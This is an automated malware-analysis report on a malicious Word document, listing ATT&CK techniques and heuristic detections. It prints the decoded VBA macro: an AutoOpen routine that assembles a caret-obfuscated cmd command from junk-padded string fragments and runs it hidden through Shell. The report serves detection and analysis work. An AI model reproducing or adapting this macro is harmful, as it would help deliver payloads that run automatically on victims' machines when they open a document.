MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon document opening. The macro utilizes the Shell() function, indicating an attempt to run an external command or program. While the exact command is obfuscated, the presence of the Shell() call and the macro itself strongly suggests the execution of a secondary payload.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6881 bytes |
SHA-256: 6b8f94fa7397bc3cc7bab361f680bdd8daeb8df6ad7abbe5828820c87b194511 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "JfmlbDuENB" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On _ Error _ Resume _ Next Hour 56023 / mQUbkE Hour rAGSJr / GaFIa Hour hZObCD / oiFPGz * 90950 * vDdSYw Shell KeyString(5 + 3 + 2 + 6 + 51) + AQwdvdwss + bwlawazoAo + WzUcci + jJUCs + WAqmjDhols + SNrBEWEj + sRtsiKzGQidGOq, 93 - 93 Hour 88402 / KEbDYj End Sub Attribute VB_Name = "QEbuVoIviDT" Function WzUcci() On _ Error _ Resume _ Next Hour 71677 / PadMB / 7413 * TjcYU Hour 45478 / YRfzQp / ljOnrY * pVrNw UJSkvRrEfE = "md /V^:" + "^O/" + "C" + Chr(0 + 0 + 5 + 1 + 28) + "^s^e" + "^t ^i^D" + "6" + "=^AAC^A" + "g^" + "A" + "^A^" + "I^AAC" + "A^g^A^A" + "I" Hour 63755 * cOLcoD MSnQzpcaIZW = "A" + "^" + "AC^A^g^" + "A" + "^A^IAA" + "CA^g^A" + "^A^I" + "^AAC^A^" + "gA^AI^A" + "AC^AgAQ" + "^" Hour FpZdzN / Tmptw Hour uGtGh * OPUrj lYslRcdn = "fA" + "0^HA^7" + "BA" + "aA^MG" + "^A0BQY" + "^AM^G" + "A^" + "9B^" + "wO^A^" + "sG^A^h" Hour NnhbH * ljnLXi Hour VknlOB * VvwbA Hour kDvpkm * slAGOu Hour 81577 / hzubQ / wHSrU / KShjCN RNiYhRbV = "^" + "BQZ^A^I" + "^H^A^i" + "^BwOA" + "8^G" + "A^BB^w" + "Q^A^QC" + "A^g^AQ^" + "bAU^GA" Hour 27826 * CcYXcV Hour ZGCNNY * vwjiBF Hour 57822 * FWRkF / 63081 * NTGzkM pOmCjL = "^0B^Q" + "^SA0C" + "^Al^Bwa" + "^A8^" + "G^A^2^" Hour AuKfpi / bSSzi * MYLwLR * DJosK Hour 89031 * ZCjab / BKjwXb * qRniRl HJtGfmSRYTZ = "Bg^" + "b^A" + "^kEA" + "7^AQ" + "^KA8G" + "^A" + "B" Hour mAFBdr / RVzkQ * PjXCi * 22213 Hour 58749 / 71 / qHNrBK / DnZlQi Hour 51156 / JEPcX * ioCDLO / vUJmN jbtBaHuHlP = "BwQA^QC" + "AgA^ALA" + "MG" + "ARBg" + "Z^" + "AQCAoA^" + "QZ" + "^Aw" + "^G^A" + "^" + "p^B" + "gR" Hour HIwzE * pWjvvJ * JGWoGi * nvptB Hour zEHbw / rQzBBc Hour 87663 / NXrNMA * zEcoFi / WOqmBB Hour JPXPz / 49068 Hour GhCKz / BbtrX * CJlvt / uPzPT Hour 79830 / wfwsEb zPwSbpQWI = "^AQ" + "G" + "^" + "Ah" + "^B^" + "w^b" + "^Aw^G^A" + "u^Bw^" + "dA^8GA^" Hour 17606 / loXLT * 5284 * FsHIID Hour rRHRMS / UGZbCP Hour 46324 * KIpKk Hour uUOjbX / jfCiiM vwKzijRPbGa = "E" + "^B^" + "g^L^" + "AQ" + "HAv" + "^BQU" + "A^Q" + "CA^" Hour qIUQms * 99565 Hour 16970 / NnuUG Hour 27010 * bPhjQt * LQuZmI / sRsSD cBzXdiwITC = "7^" + "B^Qe^" + "AI^HA" + "0^B" + "w^eAk" + "C" + "^ATB^w^" + "TA^M" + "^" + "HA" + "kA^A^I^" Hour CvZMMk * pBQwz DJQXHRIfJkJ = "A4GA" + "^pB^" + "A^I" + "^AM^" + "G^" + "ARBg^" + "Z" + "^A^QC" + "AoA" WzUcci = UJSkvRrEfE + MSnQzpcaIZW + lYslRcdn + RNiYhRbV + pOmCjL + HJtGfmSRYTZ + jbtBaHuHlP + zPwSbpQWI + vwKzijRPbGa + cBzXdiwITC + DJQXHRIfJkJ Hour 29288 / sahab End Function Function jJUCs() On _ Error _ Resume _ Next Hour TNoqN / uvIQA * 56055 * 95058 Hour szvcc * 77625 Hour qnMmJ / 8365 Hour 4230 * ZdfTMz Hour 96695 * bsJpIJ NPWlqzwmiH = "^A" + "^" + "a" + "AMG^A" + "^hB^Q" + "^" Hour 68058 * zMwjjp Hour 50986 * OsVWbP / 98136 / 11869 Hour JBOfP / ztiZol / 68348 * lMkoWk OFKjSVBFSR = "ZA^I^H^" + "AvBgZ" + "^A^sDA" + "n^" + "A^Q^ZAg" + "H^A^" + "l^Bg^L^" + "AcCArA^" Hour 31100 / wBZmo * 70762 / rDaZjl Hour 67840 / jwmBBc VcFbNRtHquu = "gSA" + "MF^A" + "p^B^A" + "^JAsCAn" + "^A^A^X" + "AcC^Ar^" + "A" + "^w^Y^A" + "^k" + "^G" + "^" + "A" Hour PfKjAv * 71928 * 72320 / jNUNEt Hour iJVFbD * jAblO / WszCZ * THCio Hour AVSWss / EuzEi * 77388 / FAAUzW LticoWv = "^s^B" + "^gYAU" + "^H^A^w^" + "Bg" + "OAYHA" + "^u" + "B^QZAQ" + "CA9AwbA" + "EE" + "A" + "D^BA^" Hour ULfob / fihLhC Hour ditIQ / tvXldN * CKoXX / AzLNEi JWoGkuwjQt = "J" + "^A^sD^" + "An^A" + "w^" + "M^A" + "gDA^4" + "A^wJA^" + "AC^" + "A^9^" + "A^AIA" + "o^E^" + "ATB^Qa^" + "A" Hour 41086 * THYWj Hour 72203 * OGhbZ Hour 56230 / NXYDi * 9587 * XjYiIR Hour KOidUs * JMiTSV DtDndXKPz = "^QCA^" + "7A^QK^" + "Ac" + "CA^AB^" + "w^J" + "^Ag" + "CA^0B^" + "Qa ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.